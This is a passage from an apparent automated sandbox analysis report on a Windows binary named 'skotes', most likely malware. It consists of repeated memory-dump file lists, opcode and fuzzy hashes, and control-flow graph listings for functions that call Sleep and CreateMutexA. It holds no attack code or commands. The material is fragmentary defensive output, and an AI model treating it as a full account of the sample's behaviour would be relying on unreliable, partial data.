                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: b1239fed194093a7d020abd090765d3974cde44529b6d36a40839e22b2f77873
                                                                                                                                                                                                                              • Instruction ID: a8997d4b4bd15ce5cc2af35290e30bdd7a22c6c90a21faebc5fd2706c3614890
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1239fed194093a7d020abd090765d3974cde44529b6d36a40839e22b2f77873
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D2137316042409BEB18AB6DEC9572DF7E2EBC1314F2042AAF418973E1E7BA99808751
                                                                                                                                                                                                                              Function 00BDA856 Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 315 bda856-bda86e 316 bda89c-bda89e 315->316 317 bda870-bda87c 315->317 320 bda8a9-bda8b1 call bd7d30 316->320 321 bda8a0-bda8a7 316->321 318 bda87e-bda88c 317->318 319 bda892-bda899 call bed663 317->319 318->319 322 bda94e 318->322 319->316 332 bda8e4-bda8e6 320->332 333 bda8b3-bda8bb call bd7d30 320->333 324 bda8eb-bda916 call be80c0 321->324 329 bda953-bda987 Sleep CreateMutexA 322->329 330 bda94e call c06c6a 322->330 335 bda98e-bda994 329->335 330->329 332->324 333->332 340 bda8bd-bda8c5 call bd7d30 333->340 337 bda9a7-bda9a8 335->337 338 bda996-bda998 335->338 338->337 339 bda99a-bda9a5 338->339 339->337 340->332 344 bda8c7-bda8cf call bd7d30 340->344 344->332 347 bda8d1-bda8d9 call bd7d30 344->347 347->332 350 bda8db-bda8e2 347->350 350->324
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 9fac82d708df853bc8b4c63bba7f394125c24f57669784c66e808e2c32beffef
                                                                                                                                                                                                                              • Instruction ID: c73ebfb27f4e2b19f81d6487ae68684898081d34e5ab781231915ec058d0cbe2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fac82d708df853bc8b4c63bba7f394125c24f57669784c66e808e2c32beffef
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A82130712491019BF7146769989676DF2D2DF81304F2448E7E904963D1FBBB5980A253
                                                                                                                                                                                                                              Function 00BDA34F Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 292 bda34f-bda35b 293 bda35d-bda36b 292->293 294 bda371-bda39a call bed663 292->294 293->294 295 bda93a 293->295 300 bda39c-bda3a8 294->300 301 bda3c8-bda916 call be80c0 294->301 297 bda953-bda994 Sleep CreateMutexA 295->297 298 bda93a call c06c6a 295->298 308 bda9a7-bda9a8 297->308 309 bda996-bda998 297->309 298->297 304 bda3be-bda3c5 call bed663 300->304 305 bda3aa-bda3b8 300->305 304->301 305->295 305->304 309->308 310 bda99a-bda9a5 309->310 310->308
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: a7dbc04660cf9f63d39d1b2b9b96aa060f12e93dc6aec8e57537598b3144911d
                                                                                                                                                                                                                              • Instruction ID: d3eb5cc4f3d821f8020e42b1c9cff7532b63b83433f9e8d16599db4de97b0ade
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7dbc04660cf9f63d39d1b2b9b96aa060f12e93dc6aec8e57537598b3144911d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0219E317042409BFB08AB6DDC8572DF7E3DBC1315F24465AE418D77D1D77A56808356

                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                              Function 00BD2EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 57040152-0
                                                                                                                                                                                                                              • Opcode ID: 5e18ff47379110c3353f6eedc7bf85d00bad8705d24bc153c0f2f49ad584825a
                                                                                                                                                                                                                              • Instruction ID: b0361ddea56a55447289c4fa14b07856d6b442d5074d26971a03cf8454ca6531
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e18ff47379110c3353f6eedc7bf85d00bad8705d24bc153c0f2f49ad584825a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8A1CF70A012469FDB10DB65C944B5AFBE8FF15714F0485AAE815E7342FB31EA05CBD2
                                                                                                                                                                                                                              Function 00C0CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
